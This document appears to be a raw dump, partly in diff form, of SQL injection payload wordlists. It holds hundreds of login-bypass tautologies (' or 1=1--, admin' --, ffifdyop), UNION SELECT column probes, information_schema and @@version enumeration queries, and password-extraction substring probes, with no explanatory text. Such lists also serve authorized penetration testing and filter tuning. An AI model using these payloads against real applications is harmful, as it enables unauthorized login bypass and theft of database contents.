||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
